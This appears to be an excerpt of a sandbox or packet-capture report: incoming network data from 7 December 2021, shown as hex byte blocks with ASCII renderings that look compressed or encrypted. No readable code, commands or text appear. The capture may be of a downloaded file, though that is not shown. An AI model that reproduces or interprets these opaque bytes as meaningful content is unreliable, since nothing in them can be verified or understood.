                                                                                              2021-12-07 12:39:06 UTC227INData Raw: ec b5 a3 d4 fc 43 fc c6 3d 49 7f db 49 c1 26 1d e1 26 55 39 8a 46 67 bf 99 dd 4c e8 3f 02 fe df e7 6c b5 5e ec 81 ec f2 db 2d 8c 05 67 d6 c9 3f 78 b5 d5 b3 a3 35 e4 ec 02 61 e5 39 15 fd e8 ff 52 36 da 7a 3d 75 73 5f 75 38 c3 d6 f4 dd 85 8e e8 eb cb 67 94 d2 37 8c 3a 60 e9 41 f1 5f a7 39 26 21 db 9c 96 69 2d e3 f8 b3 72 9f d8 ff b7 fd 07 ab de ff be ff 20 35 80 ff de 5e ba 0c 03 f8 87 49 ee d7 7b e1 2c 98 7f bc 56 0f 1f 99 7b 71 52 13 95 ff ce 5f cd 65 17 5c 90 e4 1c a4 e6 1f 35 77 4d 35 f2 8a 48 fd 77 61 42 d3 06 f1 6d fe be 1b c7 b4 69 cd 3d f9 f9 f4 3f fb 1f bf 51 ff 7c d7 3a ec b6 be 7f 0c eb 78 98 60 fe 33 6b f7 51 46 40 af c6 4e 6a fe 91 76 d3 57 71 96 cf 16 33 1e ec 2f 22 3f 1a fa b7 a5 c4 fe 1f dc ae 37 bb 96 9b 25 3f 7f eb d3 ba f7 c1 0e 61 8b 9f
                                                                                              Data Ascii: C=II&&U9FgL?l^-g?x5a9R6z=us_u8g7:`A_9&!i-r 5^I{,V{qR_e\5wM5HwaBmi=?Q|:x`3kQF@NjvWq3/"?7%?a
                                                                                              2021-12-07 12:39:06 UTC234INData Raw: 7f 15 fc cf 49 f0 3f 4b a1 ff 0c b4 7d e2 1d 9b 54 a1 79 26 6a 7b b9 73 c7 3b 32 ff 5a 37 30 ff 9a 2d 36 8f 3e fd 8f f9 d7 e5 01 fc 33 e1 ff 7d ed 01 64 fe df 3d 10 ff 6c 4b 36 6a 1a ff 31 ff bf 32 90 ff 1b 80 bf 2a 6d 32 e1 7f 47 0e f0 ff 15 e1 3b 0a 25 ff e0 ff 4f 0d d4 7f ef d1 ff a9 e7 55 13 fb 1f 1d e0 ff bb 19 5d b1 dd 7f f0 ff 87 06 fa 7f 0e de 7f 2a 8d 5d 56 d0 45 e3 69 f7 df 8b 78 d5 36 2d a6 08 fc 67 23 23 4f 51 68 90 ff 3c 08 fd e3 86 cc 8d c0 6f 8c f8 cf 96 97 4c 1e 12 5f d4 ca 76 f0 17 ae b6 91 e2 54 15 9c aa a9 b1 5d eb 3d 2b a9 40 b3 33 ca b5 dc b3 23 2b 6e aa f9 6c fa e5 c8 53 96 e6 ee 2f 55 17 8a d5 30 54 e4 fd 1d bd a5 0e 49 97 02 ff 24 e0 37 ff a5 ff 99 66 1d 5b 68 72 e8 7b eb 84 e9 56 9b d2 07 f0 53 fc 87 db 7b 41 fd c3 8e f8 a3 fe 61
                                                                                              Data Ascii: I?K}Ty&j{s;2Z70-6>3}d=lK6j12*m2G;%OU]*]VEix6-g##OQh<oL_vT]=+@3#+nlS/U0TI$7f[hr{VS{Aa
                                                                                              2021-12-07 12:39:06 UTC242INData Raw: 8d d6 49 0e 16 c2 6d 36 29 9c 55 f0 ff ef 88 7f 71 49 89 b0 3f 35 ff 10 cc ff 74 c1 ff ff 72 5f 05 fc eb 89 fe 81 9a 7f 0b f8 ff 66 f0 3f 73 31 ff 1e 81 f8 b7 0d f1 cf 13 fc d7 02 f0 5f 14 ff 97 81 f8 d7 07 ff 77 e5 d6 e2 fd 4f 56 d9 89 fc 37 0e f8 7b 31 ff bc 8a f8 cf 24 f5 ff 21 82 ff 2e f8 7f 3d e0 ff cf f9 77 39 fc df 04 f3 8f a1 f6 6c bc 7f 96 ef 3a 06 43 eb 3b ab d0 45 01 fd 8f 28 89 7f 92 a8 ff e7 b8 25 f4 f3 d0 ff e1 fe 3f b9 ff 35 1a f3 ff 8d a4 ff b7 61 2c 22 f3 5f 57 c2 ff b9 92 fe bf 14 f3 8f 61 e0 bf 52 c0 7f 8d 22 fd 0f c5 7f ec c6 fc 23 06 fc cf 35 f4 7f b9 64 fe 47 cd 7f 52 d0 ff 4c 8f 3c 87 f8 b7 0a f1 cf 16 f8 0f 38 ea 12 fe 5f 70 ff c0 1c f1 df bd 25 93 b9 a6 dd 8d ff de 7e 0d ea ff f1 c6 55 fa 86 a8 7f c7 a1 ff 3b 02 ff 4f e7 c6 63 fe
                                                                                              Data Ascii: Im6)UqI?5tr_f?s1_wOV7{1$!.=w9l:C;E(%?5a,"_WaR"#5dGRL<8_p%~U;Oc
                                                                                              2021-12-07 12:39:06 UTC250INData Raw: ac 2b 84 b7 16 f3 1f 5a db e2 98 a1 e8 ff 28 fe 53 b8 93 9a ff de 45 fe 2f 1b dc ff 1c 46 e6 df 26 64 ff 75 13 de 3f 75 ff 67 3a ea 1f 6a ff 57 a0 ff 7a 8a fa 9f e2 7f 2e c3 fe e7 60 ff 1e f0 3f 6f c8 fe f3 12 b2 ff 70 6c 80 ff 29 42 fd f3 f7 fd 9b 10 f0 df 21 d8 7f 3b 05 fd e7 0d e8 1f 16 83 ff bb ae e2 de b0 2c e5 47 ad 0a d1 bf 68 83 ff 56 c1 fd 97 1a cc 3f a9 f9 bf a1 95 34 f6 3f b6 e2 ff 27 45 f8 7f 17 ee 9f 55 5a 5c 27 fd 7f 11 fa ff 9d d0 bf 3e 27 fb ef 94 fe 57 8d e8 bf 05 f7 4f 76 83 ff b2 c2 fc 6b 0b b9 7f 11 4e db 4a f6 3f 1b 91 ff fe c9 ff e9 24 ff 53 fa c7 5c a2 ff 5f 05 fd e3 2c dc 7f fa 0e fd 6f 04 f6 5f 26 c4 8f c4 ff b7 2f 84 5f a3 fe e9 86 ff 4f 81 ff 53 f7 6f 1a 08 ff e9 4a e6 df 2c d2 ff a8 0e f0 9f 87 11 ff 47 0c dc 3f 7a 42 ee 9f 51
                                                                                              Data Ascii: +Z(SE/F&du?ug:jWz.`?opl)B!;,GhV?4?'EUZ\'>'WOvkNJ?$S\_,o_&/_OSoJ,G?zBQ
                                                                                              2021-12-07 12:39:06 UTC258INData Raw: f0 7f ef 32 0d e0 3f 83 d2 51 f0 7f 58 80 f5 9f 91 bb dc 3e 98 1a dc 6a 8d f7 ef 03 f0 cf b3 c8 ff 99 f8 c7 ff be 9a e2 9f 64 ff 2d d0 ff 33 e7 9f 84 ff 56 4a f7 ff af fe f7 66 d8 ff ef 38 ff fe d0 3f 2d f5 0d 93 f1 80 fe 2b 81 a1 0c fc 7f 1a f8 cf 4c fe 3f e1 ff 39 51 ff 17 82 ff 6d a5 fc 6f 6b e0 3f 24 ff d0 1a fe 8f 57 a9 ff 41 09 e5 ff 13 fe c7 1b ea 7f 42 f8 df 31 34 ff 36 85 e6 df 09 b3 f2 6f 99 f8 27 f1 ff 24 fa c7 7f f2 ff f9 f0 ff 07 53 fd 77 11 f5 bf 23 f3 af bf f6 bf 22 b4 ff bd 89 fc bf 5a 3a ff 4d a6 fd 3f e9 ff 8c 68 fe e1 2b 3a ff 25 f9 87 8a 34 ff 91 e8 3f 49 ff 4f fc 6f ab 28 ff 4f 98 ce 7f 9b a9 ff 05 93 ff c0 cf ca ff 64 e2 7f cc fc eb 4b 34 ff cc 9d fa 5f ff 75 fe bf 02 f5 ef 9a 81 b7 c8 bf bd c0 bf 95 a7 0e f9 d7 1b 32 62 9d af 3a bb
                                                                                              Data Ascii: 2?QX>jd-3VJf8?-+L?9Qmok?$WAB146o'$Sw#"Z:M?h+:%4?IOo(OdK4_u2b:
                                                                                              2021-12-07 12:39:06 UTC266INData Raw: 3a ff b7 03 fe 69 46 f9 0f e3 e9 fc e7 3e 2b ff 6d 0f ed 7f 89 ff ed 52 96 fe 7b 09 4b ff f5 9c fa 7f 3c a4 f8 9f 2f ed ff 8e 50 ff 2b 6e ea 7f ea 03 fd ff 6f fc 8f 1d fc 17 a6 ff 35 f1 bf 30 73 be 03 fd 73 15 cd 3f 5d 44 fd 0f 3a 59 fe ef 4c fd cf 6b 16 ff 5f 16 f8 f7 1a ac ff 3c cd ff f5 a0 fc df 3c 9a ff 25 4f fd 3f 18 58 3f 27 f5 3f 22 f8 4f 05 fc 4f 17 50 fd 1b c9 7f 65 fa 7f 31 f3 3f 0f a1 ff dd 40 fd bf 27 53 fd 0f e1 3f 92 f9 ff 72 ea 7f 27 4f f5 0f 4c ff 63 92 7f dd c5 e2 ff 54 d1 f9 4f 26 c5 bf 88 ff 2b 59 3f 73 fe c3 cc 7f 10 fb 1f fa 67 f2 fe 6b 27 77 61 fd 07 59 f9 1f 89 ac fc 93 bd 34 ff f6 2a d5 3f e4 d0 fc 4f a6 ff 01 17 cd bf 55 82 ff 0f f1 7f 21 fa bf 61 8a ff ca 52 fc 7f 11 9d ff 18 52 ff 57 a6 fe 69 ce 1f ff af 85 c8 ff 20 fa 5f 73 9a
                                                                                              Data Ascii: :iF>+mR{K</P+no50ss?]D:YLk_<<%O?X?'?"OOPe1?@'S?r'OLcTO&+Y?sgk'waY4*?OU!aRRWi _s
                                                                                              2021-12-07 12:39:06 UTC273INData Raw: e2 bf af 28 ff 99 d4 3f 89 38 ff 0d d4 ff 9d f0 1f 99 e7 df 97 fa 3f 30 e7 1f 1b 80 ff 38 d0 f3 bf 88 9e ff bf df 7f db 7f 36 c0 ff de 91 e6 bf 87 43 ff e5 01 ff bb 2a bd b2 1e 27 59 5d e8 3f 8d 0c 2e 22 ff 6a 15 f2 4f ce 83 ff b2 0a f9 df 43 d0 bf 46 20 ff 8f 1b fc 9f f9 ac fc 07 61 3a ff ae a2 f8 37 e1 7f f2 d3 fc 07 63 9a ff 4b f8 5f 07 29 ff e3 03 9d 7f 30 f3 6f d8 a9 ff 41 1a 9d 7f 74 fe 8b ff 15 c0 11 29 dd c0 99 06 fe d3 58 f0 5f 3a da 3f 22 ff f6 ae c8 4b e4 bf 73 81 ff a1 0d fe 97 23 fc 7f 75 55 b8 83 5b 8c 07 d1 ff 5d a2 fe 5f ab e1 ff c5 87 fc d7 7c e4 bf 76 e3 fc 73 05 e4 23 ff f3 2a f8 1f 5f a0 ff 78 00 fd e7 39 c6 4d ab af f0 7f dd 87 fc a3 0b b7 be d6 ac 07 ff 63 16 f4 9f 44 ff f1 1b ff 53 ff c3 ff db 8a f7 6f 3a ea 1f 7d 5a ff 92 fc 1f 52
                                                                                              Data Ascii: (?8?086C*'Y]?."jOCF a:7cK_)0oAt)X_:?"Ks#uU[]_|vs#*_x9McDSo:}ZR
                                                                                              2021-12-07 12:39:06 UTC281INData Raw: 39 2b 25 2a a5 26 d3 f7 5f 94 e7 4d f0 fb 5e bf 3f ff 3f 59 bf ed c1 fe ee c3 f7 c7 70 f8 68 30 f9 bf 0d 26 0f 37 f8 57 bc fe 73 ff 91 f5 2b 6e 58 6e 34 dc a6 ac 28 cf 55 7a e8 f7 fa 4f 49 0f 75 aa fd 73 fd 21 07 f3 7c ca 97 e9 2e be df b2 f4 f7 fe 1b 73 be 3b 99 f5 af fd cf f6 91 c3 ff 3f 26 44 f9 cf f9 af b6 e4 55 91 f8 e7 f9 17 37 d4 5f f8 d9 87 ee 7f f4 e1 39 66 51 8d b7 a3 78 58 f8 17 d9 7f 76 6e 26 ff b3 f0 d0 22 1b e7 f7 3f 19 ff 5c ff 05 ac 3f 8b 59 ff 1b b8 0d 17 f0 cf 1e ee 58 c4 3c ff cc f5 ef b8 c0 fc ff 1f 98 be e7 38 3e 27 c8 5c bb 89 39 ff fe 7d ff 6d c2 fa 37 94 31 f7 7f c6 90 b9 62 7d 5c 4e 3d b9 ff 4d b0 fe 3b 38 ff 8f e7 32 d7 5f 84 ff 5f 34 55 ad a7 72 87 ff df ee bf fb 58 ff b0 07 f3 fe bb 7c cc bb fd 03 43 3e 44 87 85 ff 90 fb cf a8
                                                                                              Data Ascii: 9+%*&_M^??Yph0&7Ws+nXn4(UzOIus!|.s;?&DU7_9fQxXvn&"?\?YX<8>'\9}m71b}\N=M;82__4UrX|C>D
                                                                                              2021-12-07 12:39:06 UTC289INData Raw: 70 76 d4 76 7d 03 fe 13 b0 91 b7 36 8b d3 78 ea 85 74 09 a1 7b 9d 04 ff 89 b7 39 33 a7 e7 23 e6 7f 1b d4 a6 01 ff f8 9e 62 66 72 3b 67 77 c8 2e ee a0 59 e4 fe cb d7 3f 84 f3 7f dd f4 d9 d8 ed 1c 3b fb 0f 46 35 ea 57 9f d9 19 3f 11 f7 5f 5c be 3d c1 ff 17 77 b1 99 38 2e ec 35 7c d4 98 30 b1 49 aa 42 42 b3 72 8a 5b c9 5a e0 1f 85 e3 2f 9c 89 45 ff e7 8c fa cf d0 9f 31 d9 a0 d3 8d 8b 63 f6 b0 86 64 c8 24 82 ff bd 9c 78 d3 6b 9c 50 8b 4c 76 7d da b3 99 d7 a6 ee 1e e2 78 23 64 67 b3 38 6a 2d f4 0f f9 04 ff 32 d9 c8 0d fc 5b 66 51 f5 f6 8e 33 b3 13 2b e3 95 eb a7 9c c8 fb 71 1c fc 87 4d d7 ab 49 ff 93 34 1d fd 4f f2 76 f7 ad bf 1c ec 72 8f 72 4c cd 78 67 b1 e9 74 25 c1 3f 27 ad e4 cc e7 a8 6d da 87 fd 4f bb ba 51 81 93 fd 7e da 47 cd aa d9 72 8e 0a 7a d8 7f 3d
                                                                                              Data Ascii: pvv}6xt{93#bfr;gw.Y?;F5W?_\=w8.5|0IBBr[Z/E1cd$xkPLv}x#dg8j-2[fQ3+qMI4OvrrLxgt%?'mOQ~Grz=
                                                                                              2021-12-07 12:39:06 UTC297INData Raw: 17 73 2e 9e 6b fe 35 3e ff ba 70 6c f9 7d 4d 44 44 c4 26 bf 71 62 f7 4b de 3e 61 44 ad 06 fa 9f a4 9b 84 ff f6 bc 97 af e1 70 43 f1 91 ec 31 7c fb 64 a7 6d be 9e 54 7e 76 be 16 f8 0f 73 e1 ff f7 ec b0 db a7 c3 c0 3f f2 32 0f 57 7c 09 ba b0 20 e7 4a 83 7c c8 88 9a bb fd 9b 2c 95 4d 5f 3f 7e 5d c7 29 55 39 53 67 fe b3 15 94 ff b4 97 b3 11 f7 9f 73 ba fe 32 13 99 5e f7 c0 fb f5 2f e3 d5 f6 13 fe bb 42 d7 a5 8d 7e 7d 5d 53 c0 7f 55 1d 93 b8 65 dd d4 77 8f ab d5 76 4b 9e 36 3d 8e fe 57 82 ff de 35 3b 54 51 89 89 fe 58 bf d3 ec e5 e5 41 cf 17 15 66 1e a8 51 e6 3e e4 1f e6 07 fe 9b ea 7c 3d a2 ff 01 ff a3 37 1f ef 3f c7 96 99 61 11 f1 f3 2a 71 ff 5d 2b 76 e3 ee d0 0c dc b1 63 e3 e1 73 cf 17 6d d1 71 56 64 c3 fe ab 5b 1a a1 fe 0b 6e 64 fb 72 21 4a 22 14 ff ff a2
                                                                                              Data Ascii: s.k5>pl}MDD&qbK>aDpC1|dmT~vs?2W| J|,M_?~])U9Sgs2^/B~}]SUewvK6=W5;TQXAfQ>|=7?a*q]+vcsmqVd[ndr!J"
                                                                                              2021-12-07 12:39:06 UTC305INData Raw: 19 44 e2 21 ff e5 6b 61 37 f0 1f 8b 21 ff e0 98 32 39 dc ff 47 d4 70 c1 ff fe 12 e4 1f e8 fe 51 04 ff 47 9a 6b 50 ff 6e f6 40 fe 03 d4 7f 38 50 ff a9 a5 7f 89 b9 52 66 e1 c2 76 62 73 9d 10 ac b0 5d c3 ee 14 c4 b2 d8 8a b0 e0 a6 d5 7a a8 c1 fc 1b de 7f 7f f8 ff 4b a6 6c 79 cc a6 4f b6 62 84 16 ba cf 58 04 85 1d 33 e7 99 38 13 ac 4c 9f a3 d1 80 f7 e7 1a e0 7f 3d a1 12 27 21 ff e1 e5 3b 11 b8 ff bf 49 b5 01 fe 65 9d 8c fc ef 94 4f 41 ff e7 fa 1c fc 3f 55 d4 57 37 b8 05 21 ff a3 46 4b 6c a2 66 ff 42 8f c5 1f be 96 55 49 34 ff e8 eb 00 fd 43 dd 06 af 88 55 f6 d4 1f dc bd a7 90 7f f1 96 06 ed ff 00 97 8a 6d 33 e5 ca 61 a4 ff d4 30 01 fe 27 37 75 67 c3 8d 69 a3 0f c6 41 d7 61 fd 65 77 cf 7d 3f 88 a6 79 42 c8 bf 6f ee ad 0a fa 4f 4f b2 75 97 fd 66 1e 87 13 4c 7b
                                                                                              Data Ascii: D!ka7!29GpQGkPn@8PRfvbs]zKlyObX38L='!;IeOA?UW7!FKlfBUI4CUm3a0'7ugiAaew}?yBoOOufL{
                                                                                              2021-12-07 12:39:06 UTC312INData Raw: 5f ed 67 8f 7b 34 cf aa bf b3 72 ee 7e 0c 2e 40 fe 7f 53 8a 6f c0 ff 80 52 86 6f 63 c6 92 13 fc 4f 7f 16 1f 12 09 92 d4 28 af c0 fd 77 27 9c 52 a2 ee bc 22 7b 4b 5e 33 bc 7f c4 f0 fe dd d4 9d 71 9f ba f7 d5 38 43 e0 ae aa b1 56 cc 8f 8c 07 d3 bd 24 85 a5 ad ca cf 66 67 28 ff fc 47 ff 60 61 c8 2a 35 75 66 e3 8f bf c1 0a cc 3f ff a8 7f 8b a8 24 52 dd df 88 55 78 73 b5 5d b7 96 17 c7 71 f6 fd 8f c7 04 6d 57 5f d2 8c 29 98 03 ff c7 b9 3d f0 66 74 2f cc ff b9 f3 f0 97 c9 e8 ef dd 5b 91 cd 0a 77 5e 2b d3 5b 25 35 25 6e 55 ec e3 aa db 90 c6 f8 1f 48 a9 63 fe ff f9 04 db a7 82 d3 19 8e c6 67 8a 12 c1 ff ac 2d 54 ec 34 69 c2 d7 1a 05 e6 a7 fa 4f e4 20 ff b1 6f ed b6 de 4a 90 fe a1 8c ba fa be f4 d6 a8 1c 27 2e f0 5f de 44 c5 3e e0 09 39 ba 75 9e a8 1a e6 3f c3 67
                                                                                              Data Ascii: _g{4r~.@SoRocO(w'R"{K^3q8CV$fg(G`a*5uf?$RUxs]qmW_)=ft/[w^+[%5%nUHcg-T4iO oJ'._D>9u?g
                                                                                              2021-12-07 12:39:06 UTC320INData Raw: 6f 83 ff c3 77 e0 7f 91 2c dd fc d1 ff 90 96 9f 3a 57 d3 88 1a e5 3f a4 64 37 52 fd 9b ff b8 0a f8 9f 75 2d c2 ff 88 e7 8b 5f 20 fc cf 98 8f ab 06 83 ff bd 01 fc af 0e 83 ff 2d e4 eb 38 20 fc ef 05 e0 7f bb 80 ff b1 a8 49 a8 3e 64 e5 fa e2 6c 7c 1c f8 5f 36 8a 2f 33 5f 42 fe f5 91 e0 50 c7 2b 67 8f c1 fd 87 f2 4f db 62 b8 bc 89 5e bb de 55 15 2b f3 bc 40 37 de 06 fc 07 3c 6c fd bf 0a f5 bf 1c d4 ff 93 ed 7d 11 d2 3f e8 98 0a c5 f6 86 54 22 0d 02 9e b9 ec c1 f9 6f b2 45 e7 df e9 c2 5f 7f c4 ff 33 8a 72 65 00 ff b7 a7 6c 42 77 81 ff 2a bd 06 eb 27 95 37 06 ff af b3 04 31 ef 39 c1 ff 42 fb ff f1 fd 5f 34 af bc 8b de ff ea 15 e1 2b 2b 63 2b 6c 4f fe d5 ff 91 2e bd 1b ff ff e8 7f 25 63 f3 e4 39 f2 bf ba 25 43 ae 02 fe 9f 13 07 91 85 75 26 97 44 ac c4 0d 9f 1f
                                                                                              Data Ascii: ow,:W?d7Ru-_ -8 I>dl|_6/3_BP+gOb^U+@7<l}?T"oE_3relBw*'719B_4++c+lO.%c9%Cu&D
                                                                                              2021-12-07 12:39:06 UTC328INData Raw: 59 7f 43 f0 a9 de 56 d5 6b a0 ff 78 34 48 75 d6 ec bd 91 88 b7 69 9d cb aa ee 25 57 f7 31 e4 ff 6b 41 d3 73 c1 41 c9 25 a9 0d f2 3f 59 dc 3d c1 ff a2 35 80 5d 19 fc ef 95 d8 f2 1d 00 ff 0f a9 83 fc e3 a6 fc c8 7d e4 ff 36 7b 54 06 fc 2f 5f 37 83 ff 55 e7 9b 9d 1b 12 d4 99 e1 02 4b f2 3d e7 e7 25 82 6c ad 8d 2f 42 fd b3 2a 4d c3 02 f7 ff 78 30 66 fe 09 f9 9f e9 d8 fc cf 1c 4c fe df 0f 75 58 7f 8f 77 43 2a ac df fc b3 01 19 76 fe d9 82 9d 7f 7e c5 de ff dc d8 fb ff 32 f6 fe 4f 47 f7 3f 19 ff 57 e0 3f f7 d1 bf 4b 83 ff 6f e9 14 ef 89 c9 ff a2 a9 80 f5 0f ac 55 b6 17 f5 f2 83 ff b3 33 f8 3f 27 83 ff b3 a7 bd 5c b6 ab d4 f4 ce c4 b3 9f 46 02 75 43 54 db f1 0c 47 1d 27 f1 d8 74 6c 1f 49 ef 4b 76 1b 9d 33 4c d7 84 fc db dd af f7 af e4 85 cc 31 58 d8 47 c9 38 30
                                                                                              Data Ascii: YCVkx4Hui%W1kAsA%?Y=5]}6{T/_7UK=%l/B*Mx0fLuXwC*v~2OG?W?KoU3?'\FuCTG'tlIKv3L1XG80
                                                                                              2021-12-07 12:39:06 UTC336INData Raw: 2c 48 85 1d f2 af 27 4f 76 4e e7 5d 3d 13 96 7a 51 0c f8 1f 07 9e 0c 24 fb 98 fc 97 73 b8 b5 37 a1 fe ff d7 ff 34 ff 46 ed 7c 12 cc 3f 8c fc 81 ff f1 23 27 22 00 f2 af 0c 06 b1 f3 af 33 09 b4 d6 68 fe 35 89 9d 7f 05 62 de ff fb 3c a0 7f 66 04 fd 33 39 e8 9f 71 9b 63 02 70 8b 32 5e 82 fe f9 55 cb af f2 59 ff 31 92 b3 7e 79 c9 ce 2b e4 fc 3f 8b 14 eb 86 a6 c9 63 7a 47 07 cc f0 50 fe a7 29 3b 86 ff 68 ae e6 72 4d e3 13 d2 bf aa ae 0b af 68 46 b9 62 fa ff ea 27 d1 80 ff 6d 7d 8d 86 fb ff 58 3f 93 20 c2 7f 87 bd 2b 55 ab 7d 1c 35 3d 48 c0 ff fc 29 e4 bf 14 60 f1 af 75 0c fe d5 c8 9e b9 49 17 76 54 28 e6 e1 d3 35 0b a6 c3 0b 66 ef ca 97 08 0c 9d b3 ca fb 1f 8a a4 a2 fc 6f dc 83 6b a9 0c 32 84 c8 ff 0d c3 ff c9 d8 17 38 81 8f fc ef 57 8c 00 ff 34 30 78 71 f0 f0
                                                                                              Data Ascii: ,H'OvN]=zQ$s74F|?#'"3h5b<f39qcp2^UY1~y+?czGP);hrMhFb'm}X? +U}5=H)`uIvT(5fok28W40xq
                                                                                              2021-12-07 12:39:06 UTC344INData Raw: 77 dc 9a aa d0 d6 03 f4 bf 97 23 bd e0 f7 03 ff 58 0d f1 5f e6 8e 1c c0 e9 bf 50 fe 0d e8 bf d0 fe 1f f4 5f 97 ea 30 fe 31 2b e8 9f 52 41 ff 74 13 f2 1f b2 cc 93 44 24 39 63 18 b7 5c ce 09 47 d2 8b e0 f4 af a2 38 fd 67 1a 4e ff d9 8e f4 9f 9f 7e db af 04 df 81 fc 17 92 cb 87 8b bf 38 5a d6 85 7a ee 76 72 f9 e8 94 f4 6d 87 d7 84 07 06 ef 97 7c 13 4c 24 67 f8 72 6b 46 55 0e d3 3f df 0c 1e 0b 79 39 77 e5 dc fb 17 24 20 e2 61 59 dd 10 9d 82 ff 3f 91 b1 19 e5 ff 45 af 81 fe 33 9d 7c e9 0b dc 7f 71 f8 8d 7b 25 41 c1 de cf e4 fb a1 fe f5 d9 bf d3 cb af f6 2e e8 38 2b f8 1f 37 8f 3c 83 fd e7 6f d0 3f 46 b8 20 fe 73 c1 6a 09 15 cc ff ee 30 fb 07 b7 4a 12 cf 07 13 91 c5 36 31 57 9f 4b 9c 4e 1e 1e fb 52 92 cd 64 4d 52 0b fa 8f df 46 30 ff 4a 1a 71 0f 8b b9 fb 89 43
                                                                                              Data Ascii: w#X_P_01+RAtD$9c\G8gN~8Zzvrm|L$grkFU?y9w$ aY?E3|q{%A.8+7<o?F sj0J61WKNRdMRF0JqC
                                                                                              2021-12-07 12:39:07 UTC352INData Raw: fe 08 2d 7c ff 15 57 1a 64 e4 eb aa 54 86 53 bc 80 7f 2f 4d 3c 3a bc a6 44 bc f4 37 ff 31 ba 32 4f 93 9c c6 2d b7 fa 91 8e b4 86 1a f0 ff e7 8f 03 ff 3c 1e e3 9f 5b 9a b1 29 b6 fd d9 34 3f 7d ab 91 d4 ac 24 fd c8 fb 97 e0 7f 2f 3f ac 16 e9 05 fc c3 a8 58 8e f6 dc b6 46 e0 df d7 08 e8 04 4a eb 73 95 df 7e 92 04 f5 3f 59 55 6f 3b 9d d2 ba 1d 96 7f 64 5b 96 08 fd df 4f 7a b2 98 7d 4c 23 98 ff c1 ef 15 e6 ff 7e a2 5a bb 79 e1 a5 e8 5b 2f 1f 17 57 31 09 25 e5 e3 91 33 c6 a9 a2 15 a0 ff 9c b8 7a af ed 04 c5 73 f0 ff d2 1e 92 37 e8 ce 01 fe ff f6 4d 33 d9 36 55 c2 5a 37 02 aa ba 39 ea 14 38 ff 27 5e 1f 80 df 6f d9 38 15 db e6 b1 0a f3 6f 05 f0 3f ab 1b f1 80 fe 6d 92 6b df 48 7f 28 19 85 15 cf cc e3 50 f3 6d 79 e0 3f 3d 6b 42 fa ff bf f7 bf 3a b6 ff 6f 90 81 f9
                                                                                              Data Ascii: -|WdTS/M<:D712O-<[)4?}$/?XFJs~?YUo;d[Oz}L#~Zy[/W1%3zs7M36UZ798'^o8o?mkH(Pmy?=kB:o
                                                                                              2021-12-07 12:39:07 UTC359INData Raw: e5 3f 2c de 45 f9 0f 83 11 d2 1d c0 3f 09 aa 83 fc 8f 3c 2c ff 23 39 ce 7d 26 1f f8 9f 9c a9 48 ff 95 68 36 8d 0f fc 4f 2b 07 1d e2 88 71 82 3a 16 46 ea 0f 8a be 4e e0 ff 46 f9 07 35 b9 e0 ff c5 e6 ff cf 10 ff 59 f1 33 f4 7f 4f 7f 7c 15 ce 39 d6 f8 21 ff 96 19 a3 d6 55 31 0f e0 9f 78 c2 fe e7 4e 3c 0b f8 df 2d 2d ac d9 87 71 fa 7f e0 ff 26 d0 56 98 9a 09 17 dc 2b 03 fe ff c1 b8 e7 a9 ea a4 9e 3c 79 87 a8 50 fe 09 17 9c 7f 59 38 ff 57 e1 fc c7 01 ff 8f 4e ce 50 b9 c2 57 ec d0 f4 1f e9 23 85 a5 11 53 b0 ff b3 90 39 8b f4 7f 2d cc e4 b5 48 ff ff 4b 30 80 5a 9b 48 18 f8 af 27 5f 4f e4 ea 16 4f 74 fd f6 8a 8d 13 9e ee 23 60 ce ce d3 62 d8 a8 98 8e f4 10 52 78 99 5c ea 3c c1 7b f9 33 f0 4f f4 d5 e4 d7 92 f5 c0 ff 2b b5 0e f3 af c6 21 61 4f b7 df 95 c0 ff 3a 47
                                                                                              Data Ascii: ?,E?<,#9}&Hh6O+q:FNF5Y3O|9!U1xN<--q&V+<yPY8WNPW#S9-HK0ZH'_OOt#`bRx\<{3O+!aO:G
                                                                                              2021-12-07 12:39:07 UTC367INData Raw: f6 99 c4 d7 6e 40 fe 5f dd 05 f5 1b 5e ad a6 57 98 b7 09 ef a5 bd a3 f6 3b 54 68 60 82 f9 9f ae 5d e4 e9 27 92 59 9e 7a 29 bb 96 eb 3a 17 11 cd 25 35 c2 1f f0 54 69 5d d1 9e a2 94 79 c1 56 f8 7c f5 57 52 62 0a e0 df a4 4e 51 97 ba 70 8c 6b 7d e2 dc fa 9d e9 08 fa cf a4 02 67 c4 bf cb ab c6 f8 e7 f3 f1 d4 ed ca 0d b3 af 07 38 73 12 8a f0 97 6c 14 89 21 ff 26 f6 47 15 e8 5f f3 22 21 ff ac b2 98 11 fc 3f 34 2f f0 81 ff f6 94 f9 ed 3e 98 ff 75 cf a0 fc 5b b3 53 a7 80 7f d3 38 8a cb bf 5d 43 f9 b7 26 86 8e 82 ec e6 5e cf f9 ec 80 7f c9 f4 be 05 f4 df 02 b6 a7 b1 f7 7f 97 17 7b ff 65 1b b1 f7 bf 1d f2 3f cd 17 59 04 22 9d f2 2f aa ed 48 51 ed 10 90 ea 82 fe 3d 12 e9 df 6d 5f 82 fe bd f8 22 9c ff ab a4 6c c0 3f 71 fa 3a 02 f9 47 19 97 5f 61 fc 07 8a 3b 50 ff b8
                                                                                              Data Ascii: n@_^W;Th`]'Yz):%5Ti]yV|WRbNQpk}g8sl!&G_"!?4/>u[S8]C&^{e?Y"/HQ=m_"l?q:G_a;P
                                                                                              2021-12-07 12:39:07 UTC375INData Raw: c5 de ee fe 90 61 b3 17 c4 70 cb 79 5f 20 05 5e be c7 75 e6 03 92 2f 1c 28 d8 39 25 a0 fe 35 86 fa d7 87 88 9d e7 28 63 33 f8 bf 4e be 07 ff f3 38 e8 9f 54 63 d2 38 db 46 0a 1f 1c 1c 15 52 db 27 63 bb 64 9d 34 39 d0 59 8b f2 af 0e 17 20 fe d7 d8 67 c4 ff ea 67 6a a7 1f 85 f9 6f ee 1a e8 1f 33 6b 1a 41 ff 57 7b a8 1b f8 0f 9f 81 ff 40 55 38 01 fa 7f ae 10 7e 5e 77 3e 0e 92 45 da f9 d9 a3 29 28 ff d3 7f 14 e9 5f af 37 b0 81 fe d5 39 f3 c2 78 d4 16 dc 7f 01 70 ff f9 6d 65 20 fe e5 b4 8b 7f 9f 01 8f de 85 6f f0 fb 65 77 df 80 ff 8b 8e fb e3 b0 34 2f e3 01 3b 2e a8 7f 3e 68 e2 1d f5 dd 7f 99 b2 87 84 0c f1 2f 47 e0 fe 1f 23 61 34 3d ff 0e f8 87 7b 47 a1 fe bd 5d b6 00 fc 83 22 a8 7f 68 5e 14 c3 fd 07 f5 9f ae 33 d4 7f 88 ff 19 78 c9 dc 6a 38 fd f4 8e 9b 90 c2
